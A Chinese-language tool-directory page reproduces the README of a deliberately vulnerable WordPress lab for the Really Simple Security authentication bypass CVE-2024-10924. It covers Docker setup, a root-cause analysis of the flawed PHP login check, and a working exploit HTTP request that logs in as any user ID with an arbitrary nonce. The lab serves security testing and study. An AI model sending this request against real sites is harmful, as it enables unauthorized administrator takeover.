Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
wordpress-really-simple-security-authn-bypass-vulnerable-application — 警告:这是一个存在漏洞的应用程序,用于测试 Really Simple Security < 9.1.2 身份验证绕过漏洞(CVE-2024-10924)。请自担风险运行! | Kitploit
工具/GitHubGitHub/m3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证实验室与实践
GitHubm3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application

wordpress-really-simple-security-authn-bypass-vulnerable-application

警告:这是一个存在漏洞的应用程序,用于测试 Really Simple Security < 9.1.2 身份验证绕过漏洞(CVE-2024-10924)。请自担风险运行!

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
811年前尚未审核
分享

wordpress-really-simple-security-authn-bypass-vulnerable-application

这是一个用于测试Really Simple Security < 9.1.2 身份验证绕过漏洞(CVE-2024-10924)的易受攻击的应用程序。

警告!

此应用程序包含严重安全漏洞。运行风险自负!建议使用已备份且隔离的环境(例如具有最近快照和仅主机网络的虚拟机)。请勿将此应用程序上传到任何面向互联网的服务器,否则将会被入侵。

免责声明:我不对任何人使用此应用程序的方式负责。此应用程序的唯一目的是为Really Simple Security < 9.1.2 身份验证绕过漏洞(CVE-2024-10924)的利用提供测试场景,不得恶意使用。如果您的服务器因安装此应用程序而被入侵,这不是我的责任,而是上传和安装它的人的责任。

漏洞信息

  • CVE-ID: CVE-2024-10924
  • Link: https://www.cve.org/CVERecord?id=CVE-2024-10924
  • 描述: 这使得当启用“双因素认证”设置(默认禁用)时,未经身份验证的攻击者可以以站点上任何现有用户(例如管理员)的身份登录。
  • 修复: https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
  • Wordfence公告: https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass

使用方法

以下是设置环境的步骤:

  1. 运行 ./up.sh 启动容器组合。
  • 在此处完成WordPress安装:https://localhost:1337/wp-admin/install.php。
  • 登录WordPress。
  • 转到“插件”:https://localhost:1337/wp-admin/plugins.php。
  • 点击“Really Simple Security”插件下的“激活”。不要更新它,因为我们需要有漏洞的版本。
  • 在弹出的SSL激活窗口中点击“取消”。
  • 转到“设置” > “登录保护” > “双因素认证”,然后在“双因素认证”部分,启用“启用双因素认证”。
  • 点击“保存”按钮。
  • 容器将被命名为 vuln-wp-really-simple-security。

    要拆除环境,请使用 ./down.sh 命令,或使用 ./down_and_delete.sh 命令同时移除镜像和数据库卷。

    根本原因

    查看修复,可以理解在易受攻击的版本中,如果登录nonce无效,check_login_and_get_user()函数返回了一个错误对象,但并未中止整个操作。

    root@kitploit:~
    private function check_login_and_get_user( int $user_id, string $login_nonce ) {
        if ( ! Rsssl_Two_Fa_Authentication::verify_login_nonce( $user_id, $login_nonce ) ) {
            return new WP_REST_Response( array( 'error' => 'Invalid login nonce' ), 403 );
        }
    
        /**
         * Get the user by the user ID.
         *
         * @var WP_User $user
         */
        $user = get_user_by( 'id', $user_id );
        return $user;
    }
    

    然而,在调用方,没有对check_login_and_get_user()函数的输出进行任何检查(第277行),而是直接使用从输入接收到的相同用户ID值,继续使用authenticate_and_redirect()函数(第278行)。

    root@kitploit:~
    public function skip_onboarding( WP_REST_Request $request ): WP_REST_Response {
    	$parameters = new Rsssl_Request_Parameters( $request );
    	// As a double we check the user_id with the login nonce.
    	$user = $this->check_login_and_get_user( (int)$parameters->user_id, $parameters->login_nonce );
    	return $this->authenticate_and_redirect( $parameters->user_id, $parameters->redirect_to );
    }
    

    利用方法

    要利用此漏洞,以下请求就足够了。

    root@kitploit:~
    POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
    Host: localhost:1337
    Content-Type: application/json
    Content-Length: 88
    Connection: keep-alive
    
    {
        "user_id": 1,
        "login_nonce": "133333337",
        "redirect_to": "/wp-admin/"
    }
    

    然后在浏览器中相应地设置返回的会话cookie。

    user_id必须为目标用户的ID,login_nonce可以是任何值,因为错误的值不会阻止进程。

    可以在此处找到用Python编写的利用脚本。

    作者

    • Antonio Francesco Sardella - 实现 - m3ssap0

    许可证

    本项目基于Unlicense许可证发布 - 详情请参阅LICENSE文件。

    致谢

    • István Márton,发现此漏洞的安全研究员。
    下载工具